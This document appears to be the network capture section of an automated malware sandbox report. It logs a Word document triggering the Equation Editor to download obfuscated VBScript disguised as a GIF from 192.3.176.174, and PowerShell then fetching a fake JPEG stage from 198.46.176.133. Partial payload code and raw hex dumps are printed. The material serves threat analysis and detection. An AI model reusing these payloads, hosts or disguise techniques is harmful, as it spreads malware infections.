                  Jul 26, 2024 13:08:45.694797993 CEST1236INData Raw: 3f 5f 40 3e 3a 38 3f 23 23 2d 3b 3f 2d 36 3f 3f 3f 29 3e b5 3f 34 3d 5d 25 3f 2b 2f 25 35 34 26 3f 3f 39 3f 31 5d 3e 35 5e 26 3a 32 5d 34 3f 27 28 39 23 2e 3e 36 3f 36 60 39 2e 3b 24 23 32 2b 7e 2e b5 24 5b 5d 60 35 24 2b 31 3f 39 3f 28 b0 3c 26
                  Data Ascii: ?_@>:8?##-;?-6???)>?4=]%?+/%54&??9?1]>5^&:2]4?'(9#.>6?6`9.;$#2+~.$[]`5$+1?9?(<&[&87$:40?|(~@#(0(.%>.|)]~$=]=8^1#*;>7)~+01550=?1?99.7>?6)!%0#|;76'($8?(@~!&@)0_5@:;4|%$!*5)]|#):~)<,?=!;-85&[~'*&6^]4,:`+>(?@~~9?4%_>?2)/?~9+#:<%+@?61#
                  Jul 26, 2024 13:08:45.694847107 CEST1236INData Raw: 37 3f 5e 7c 5b 25 27 3f 24 23 35 31 2f 36 3f 7c 36 30 3f 5d 3f 40 3f 28 34 2c 37 33 7c 36 35 3f 26 40 27 3a 38 24 35 36 21 31 3f 2a 34 25 3f 5e 2b 3b 32 37 35 2e 31 3c 28 27 28 3b 5f 23 5e 38 27 b0 3f 25 7c 38 2b 3e b5 3e 3f 28 35 27 23 28 3f 7c
                  Data Ascii: 7?^|[%'?$#51/6?|60?]?@?(4,73|65?&@':8$56!1?*4%?^+;275.1<('(;_#^8'?%|8+>>?(5'#(?|,$?9'05=^0#8_.|&)83]!?+!?~`-(4%~5?$,`',8`?6?,75?)'[&*21*$21?1~@#?,%&><_4?$-?+|?+7@&~)#,;&8'^4?!3<89](/??)4(2~]-6=8]1[?<+>/7:?~*?:*([2>!(;*?,+[.-^34_=*|?+/)?
                  Jul 26, 2024 13:08:45.697230101 CEST1236INData Raw: 2f 38 60 2d 7e 24 25 40 7c 3c 30 3b 39 2c 2a 21 3f 25 27 7e 40 3d 3e 39 5d 32 34 23 21 37 25 26 3f 3c 3f 3a a7 2f 2e 5e 2d 32 34 3a b5 25 b0 36 23 3d a7 60 24 25 26 27 3b 5f 2d 39 3f 26 2b 3d 7c 37 3f 25 34 5d 5d 3a 37 2b 5f 34 b0 28 3f 7e 3f 5d
                  Data Ascii: /8`-~$%@|<0;9,*!?%'~@=>9]24#!7%&?<?:/.^-24:%6#=`$%&';_-9?&+=|7?%4]]:7+_4(?~?]_8<9%=?54?*>~,_?@#9'?)7|?^4#57=9,?$63!>??~2%`')$=4.?>]#%,^]3(~@$@0>8+12>~3>^%#;:(?7|914%#3%!?,6?%,.4>*|-2:?7??</18?#0)0:$%|]^305?1??<4~?$?8/1?>+4(0*
                  Jul 26, 2024 13:08:45.697247982 CEST1236INData Raw: 25 35 32 5b 2b 7c 27 3c 36 3d 3e 26 3c 29 3f b0 2d 28 2a 7c 2b 2d 31 3b 31 3f 2a 3c 32 2e 3f 26 31 3a 5f 60 3f 3f 31 21 2a 2c 31 23 2f 7e 2f 23 2a 2e 3d 35 34 2b 32 25 3e 31 25 3e 25 b0 26 32 2b a7 3f b0 36 5d 25 34 5f 38 5f 3c 3e a7 3b 3f 5b b5
                  Data Ascii: %52[+|'<6=>&<)?-(*|+-1;1?*<2.?&1:_`??1!*,1#/~/#*.=54+2%>1%>%&2+?6]%4_8_<>;?[*!<10![3#(*8^&):-5+__'&6*>33;?>??!.79$,>9=?>=^)8$-2.??.|.)#?|:=`!?`'$1]#.6)?</=_`%*?^%8?;?*%.5)&>00&:;#(#?((4&:%%`3|6*#=#0*1?.%'%0`%0$_5-3-?5+);?~)1?01?&%~?
                  Jul 26, 2024 13:08:45.700047970 CEST1236INData Raw: 20 20 09 09 20 09 09 09 09 09 20 09 09 20 20 20 20 20 20 09 09 20 09 20 20 20 09 20 09 20 20 09 09 09 09 20 20 20 09 09 09 20 39 0d 0d 0a 0a 0a 0a 0a 0a 0a 0d 0a 0a 0d 0a 0a 0a 0d 0d 0a 0a 0d 32 61 20 09 20 09 09 09 09 09 20 20 20 20 20 20 20 20
                  Data Ascii: 92a 0 2000
                  Jul 26, 2024 13:08:45.700064898 CEST1236INData Raw: 20 09 09 20 09 09 20 20 09 20 20 09 20 20 20 20 20 09 09 09 20 30 0d 0d 0d 0d 0a 0d 0d 0a 0d 0a 0a 0a 0d 0a 0a 0a 0a 0a 0d 0a 0d 30 09 09 09 20 20 20 09 09 09 09 09 20 20 20 20 20 09 20 20 09 20 09 20 09 20 09 20 09 09 20 20 09 09 20 20 09 20 09
                  Data Ascii: 00 0 05e0
                  Jul 26, 2024 13:08:45.702858925 CEST1236INData Raw: 0d 0d 0a 0d 0a 0d 0d 0a 0a 0d 0a 0d 37 0d 0a 0a 0a 0a 0a 0a 0d 0a 0d 0d 0d 0d 0a 0d 0d 0a 0a 0d 0a 0d 30 0a 0a 0a 0d 0d 0d 0a 0a 0a 0d 0a 0d 0d 0d 0a 0d 0a 0a 0d 0a 0d 31 61 0a 0d 0a 0d 0d 0d 0d 0a 0a 0d 0a 0d 0d 0d 0a 0d 0a 0a 0d 0a 0d 62 0d 0d
                  Data Ascii: 701ab8b45b 08
                  Jul 26, 2024 13:08:45.702874899 CEST1236INData Raw: 0d 65 30 0d 0d 0d 0a 0a 0d 0a 0a 0a 0a 0a 0a 0d 0a 0a 0a 0d 0d 0d 0a 0d 32 0d 0d 0d 0a 0a 0d 0a 0a 0a 0a 0a 0a 0d 0a 0a 0a 0d 0d 0d 0a 0d 33 39 31 30 20 20 09 09 09 20 09 09 09 20 20 09 09 09 09 20 09 09 09 09 09 09 09 20 09 20 20 09 09 20 09 20
                  Data Ascii: e023910 fd57 0150fea4
                  Jul 26, 2024 13:08:45.705760956 CEST1236INData Raw: 09 09 09 20 09 09 09 09 20 20 09 20 20 09 09 20 09 09 20 20 20 09 20 09 20 09 20 09 20 09 09 20 09 09 09 20 20 20 20 20 09 20 09 20 09 09 09 20 36 20 20 20 09 20 20 20 09 20 20 09 20 09 20 09 09 09 09 20 09 09 09 09 20 09 09 09 09 20 20 09 20 20
                  Data Ascii: 6 7 fff91
                  Jul 26, 2024 13:08:45.705840111 CEST1236INData Raw: 09 09 09 20 20 09 20 20 09 20 65 20 09 20 09 09 09 20 20 09 20 09 20 20 09 20 09 09 20 09 09 09 09 20 09 20 09 09 20 20 20 09 20 09 09 09 09 20 20 09 09 09 20 20 20 09 09 20 09 09 09 20 09 20 09 09 20 20 20 09 09 09 20 20 09 20 20 09 20 39 09 09
                  Data Ascii: e 9 6f01000


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.2249167188.114.97.3802504C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 13:08:46.836004972 CEST129OUTOPTIONS / HTTP/1.1
                  User-Agent: Microsoft Office Protocol Discovery
                  Host: tny.wtf
                  Content-Length: 0
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:47.108252048 CEST558INHTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:47 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jJElqVnUA8jKAx%2F3PmV0wFJdjDNyvn8deX5%2B0FMsEEFY2LgzOlpDDiWBEmqVoyPaex68lylLAgyk9nol7pY2Y03zAZpaFKvvz4cN800pE244OSTpBPUufyBF"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef0988077288-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0
                  Jul 26, 2024 13:08:47.367516041 CEST129OUTOPTIONS / HTTP/1.1
                  User-Agent: Microsoft Office Protocol Discovery
                  Host: tny.wtf
                  Content-Length: 0
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:47.515921116 CEST562INHTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:47 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3zRELeiEaDmw4y51hpaSqR5HJUC7tJYsS6NiS8pIdb8C4VnJ%2BAFmlxrWEe4Ehzvc1hOVzJpro8aThAGNaDy1v1Jf1MuEDT6My%2FkHgsficCy1%2BHgs915%2Bj46"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef0c5a7e7288-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0
                  Jul 26, 2024 13:08:47.524637938 CEST129OUTOPTIONS / HTTP/1.1
                  User-Agent: Microsoft Office Protocol Discovery
                  Host: tny.wtf
                  Content-Length: 0
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:47.677181959 CEST560INHTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:47 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6f%2BYPJbcgtCcj7FAeR%2B3SmYzifSQgkg5DDsALOW850tHuATRAJEs04PCjkDMyoSDzzcFcXtlXs3y0gZ83gqmPazoOWQlVTepC7Hq1luWpTVG%2F6VaEILJLz5"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef0d5b577288-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0
                  Jul 26, 2024 13:08:52.411298037 CEST129OUTHEAD /sA HTTP/1.1
                  User-Agent: Microsoft Office Existence Discovery
                  Host: tny.wtf
                  Content-Length: 0
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:52.580640078 CEST548INHTTP/1.1 405 Method Not Allowed
                  Date: Fri, 26 Jul 2024 11:08:52 GMT
                  Connection: keep-alive
                  Allow: GET
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=69z6GR35FERSrAftuEP4Jq3vDRrFRNMcwRs3qWPs5iBKtKhZOG%2BqqkIDV70o8Q3LfVu9eDJsgFq0%2Bf0uHoUXRzUqok3wMtf4emB1tqyis6kj4dz%2F93inL4QX"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef2beb7c7288-EWR
                  alt-svc: h3=":443"; ma=86400


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.2249168188.114.96.3802504C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 13:08:47.752281904 CEST110OUTHEAD /sA HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Microsoft Office Existence Discovery
                  Host: tny.wtf
                  Jul 26, 2024 13:08:48.301784039 CEST544INHTTP/1.1 405 Method Not Allowed
                  Date: Fri, 26 Jul 2024 11:08:48 GMT
                  Connection: keep-alive
                  Allow: GET
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT8EM5KiQy3%2Fa69BXqQrXmwae9jBZDQSWfCVNh9Lwqc02hqOKtuS6RJyRlGl5snmax2mwcG7Vf3C1tJpuj8eBSXGC9X9Hv7sI22gM4tSdazJ0xgNVygo1t6k"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef1109ce8cbf-EWR
                  alt-svc: h3=":443"; ma=86400
                  Jul 26, 2024 13:08:48.514794111 CEST544INHTTP/1.1 405 Method Not Allowed
                  Date: Fri, 26 Jul 2024 11:08:48 GMT
                  Connection: keep-alive
                  Allow: GET
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT8EM5KiQy3%2Fa69BXqQrXmwae9jBZDQSWfCVNh9Lwqc02hqOKtuS6RJyRlGl5snmax2mwcG7Vf3C1tJpuj8eBSXGC9X9Hv7sI22gM4tSdazJ0xgNVygo1t6k"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef1109ce8cbf-EWR
                  alt-svc: h3=":443"; ma=86400


                  Session IDSource IPSource PortDestination IPDestination Port
                  4192.168.2.2249169188.114.97.380
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 13:08:51.734004974 CEST124OUTOPTIONS / HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                  translate: f
                  Host: tny.wtf
                  Jul 26, 2024 13:08:52.280599117 CEST566INHTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:52 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prf2EfDG%2FCvxWIKSDeHLWKkfPTRVsDRCuAyW86jiVQSWKfa%2B1kiG8tSJiY%2FSvWP3xgtqHIfqHeO7mMkS287lmAmNei3rpT18q%2FqWq1khLz%2BA%2BqJLrw1dVGQ1"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef29effcc354-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0
                  Jul 26, 2024 13:08:52.496649981 CEST566INHTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:52 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prf2EfDG%2FCvxWIKSDeHLWKkfPTRVsDRCuAyW86jiVQSWKfa%2B1kiG8tSJiY%2FSvWP3xgtqHIfqHeO7mMkS287lmAmNei3rpT18q%2FqWq1khLz%2BA%2BqJLrw1dVGQ1"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef29effcc354-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.2249170192.3.176.174803120C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 13:08:53.072285891 CEST333OUTGET /60/creatednewwaterbottleforme.gIF HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 192.3.176.174
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:53.571343899 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 11:08:53 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                  Last-Modified: Fri, 26 Jul 2024 05:56:01 GMT
                  ETag: "667e4-61e202a894788"
                  Accept-Ranges: bytes
                  Content-Length: 419812
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: image/gif
                  Data Raw: ff fe 64 00 69 00 6d 00 20 00 70 00 6c 00 61 00 74 00 69 00 6e 00 61 00 6d 00 69 00 6e 00 61 00 20 00 0d 00 0a 00 70 00 6c 00 61 00 74 00 69 00 6e 00 61 00 6d 00 69 00 6e 00 61 00 20 00 3d 00 20 00 6d 00 65 00 6c 00 65 00 61 00 6e 00 74 00 65 00 0d 00 0a 00 61 00 63 00 6f 00 76 00 61 00 72 00 28 00 22 00 6d 00 61 00 72 00 61 00 6e 00 68 00 61 00 72 00 22 00 29 00 20 00 26 00 20 00 70 00 6c 00 61 00 74 00 69 00 6e 00 61 00 6d 00 69 00 6e 00 61 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 61 00 63 00 6f 00 76 00 61 00 72 00 28 00 22 00 64 00 72 00 75 00 70 00 61 00 22 00 29 00 20 00 26 00 20 00 70 00 6c 00 61 00 74 00 69 00 6e 00 61 00 6d 00 69 00 6e 00 61 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 61 00 63 00 6f 00 76 00 61 00 72 00 28 00 22 00 69 00 6e 00 64 00 69 00 67 00 65 00 6e 00 61 00 74 00 6f 00 22 00 29 00 20 00 26 00 20 00 70 00 6c 00 61 00 74 00 69 00 6e 00 61 00 6d 00 69 00 6e 00 61 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 61 00 63 00 6f 00 76 00 61 00 72 00 28 00 22 00 6d 00 75 00 6c 00 68 00 65 00 [TRUNCATED]
                  Data Ascii: dim platinamina platinamina = meleanteacovar("maranhar") & platinamina & _acovar("drupa") & platinamina & _acovar("indigenato") & platinamina & _acovar("mulherinha") & platinamina & _acovar("X_HelpUris_005_0_Message") & platinamina & _acovar("antro") & platinamina & _acovar("mascarada") & platinamina & _acovar("X_HelpUris_008_0_Message") & platinamina & _acovar("X_HelpUris_009_0_Message") & platinamina & _acovar("X_HelpUris_010_0_Mess
                  Jul 26, 2024 13:08:53.571564913 CEST1236INData Raw: 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 70 00 6c 00 61 00 74 00 69 00 6e 00 61 00 6d 00 69 00 6e 00 61 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 61 00 63 00 6f 00 76 00 61 00 72 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 55 00 72 00
                  Data Ascii: age") & platinamina & _acovar("L_HelpUris_011_0_Message") & platinamina & _acovar("L_HelpUris_012_0_Message") & platin
                  Jul 26, 2024 13:08:53.571603060 CEST1236INData Raw: 0a 00 61 00 63 00 6f 00 76 00 61 00 72 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 55 00 72 00 69 00 73 00 5f 00 30 00 31 00 35 00 5f 00 36 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 70 00 6c 00 61 00
                  Data Ascii: acovar("L_HelpUris_015_6_Message") & platinamina & _acovar("L_HelpUris_015_7_Message") & platinamina & _acovar("X_Hel
                  Jul 26, 2024 13:08:53.573201895 CEST1236INData Raw: 63 00 68 00 65 00 73 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 0d 00 0a 00 0d 00 0a 00 64 00 69 00 6d 00 20 00 70 00 6c 00 61 00 74 00 69 00 6e 00 61 00 6d 00 69 00 6e 00 61 00 45 00 45 00 20 00 0d 00 0a 00 70 00 6c 00 61 00
                  Data Ascii: ches_Message")dim platinaminaEE platinaminaE = meleanteacovar("L_HelpAlias_001_0_Message") & platinaminaE & _a
                  Jul 26, 2024 13:08:53.573237896 CEST1236INData Raw: 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 61 00 63 00 6f 00 76 00 61 00 72 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 31 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00
                  Data Ascii: E & _acovar("L_HelpAlias_011_0_Message") & platinaminaE & _acovar("x_HelpAlias_012_0_Message") & platinaminaE & _aco
                  Jul 26, 2024 13:08:53.575146914 CEST1120INData Raw: 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 34 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 65 00 70 00 6c 00 61 00 74 00 69 00 6e 00 61 00 6d 00 69 00 6e 00 61 00 45 00
                  Data Ascii: HelpAlias_004_0_Message") & eplatinaminaE & _acovar("X_HelpAlias_005_0_Message") & eplatinaminaE & _acovar("X_HelpAlia
                  Jul 26, 2024 13:08:53.575184107 CEST1236INData Raw: 61 00 63 00 6f 00 76 00 61 00 72 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 31 00 34 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 65 00 70 00 6c 00
                  Data Ascii: acovar("L_HelpAlias_014_0_Message") & eplatinaminaE & _acovar("X_HelpAlias_015_0_Message") & eplatinaminaE & _acovar("
                  Jul 26, 2024 13:08:53.576875925 CEST1236INData Raw: 6f 00 76 00 61 00 72 00 28 00 22 00 58 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 37 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 6f 00 65 00 70 00 6c 00 61 00
                  Data Ascii: ovar("X_HelpAlias_007_0_Message") & oeplatinaminaE & _acovar("X_HelpAlias_008_0_Message") & oeplatinaminaE & _acovar("
                  Jul 26, 2024 13:08:53.576910973 CEST1236INData Raw: 69 00 61 00 22 00 29 00 0d 00 0a 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 4f 00 70 00 6c 00 61 00 74 00 69 00 6e 00 61 00 6d 00 69 00 6e 00 61 00 59 00 43 00 53 00 43 00 52 00
                  Data Ascii: ia")private const L_OplatinaminaYCSCRIPT_Message = "Can be executed only by cscript.exe."private const L_UNKOPNM
                  Jul 26, 2024 13:08:53.578710079 CEST1236INData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 75 00 73 00 65 00 20 00 6f 00 66 00 20 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 6c 00 69 00 6e 00 65 00 2e 00 20 00 54 00 79 00 70 00
                  Data Ascii: = "Invalid use of command line. Type ""winrm -?"" for help."private const L_HELP_GenMessage = "Type ""winr
                  Jul 26, 2024 13:08:53.578752041 CEST1236INData Raw: 4f 00 4e 00 4d 00 49 00 53 00 53 00 49 00 4e 00 47 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 3d 00 20 00 22 00 41 00 63 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6d 00 69 00 73 00 73 00 69 00 6e 00 67 00 22 00
                  Data Ascii: ONMISSING_Message = "Action is missing"private const L_URIZERO_Message = "URI is 0 length" private const


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.2249171198.46.176.133803240C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 13:08:56.389775038 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
                  Host: 198.46.176.133
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:56.914166927 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 11:08:56 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                  ETag: "1d7285-61ce2d35c4b0c"
                  Accept-Ranges: bytes
                  Content-Length: 1929861
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: image/jpeg
                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
                  Jul 26, 2024 13:08:56.914302111 CEST1236INData Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04
                  Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:
                  Jul 26, 2024 13:08:56.914315939 CEST1236INData Raw: 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a
                  Data Ascii: cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                  Jul 26, 2024 13:08:56.914815903 CEST1236INData Raw: eb 61 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70
                  Data Ascii: aY w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                  Jul 26, 2024 13:08:56.914829969 CEST1236INData Raw: 57 5c 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30
                  Data Ascii: W\*`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
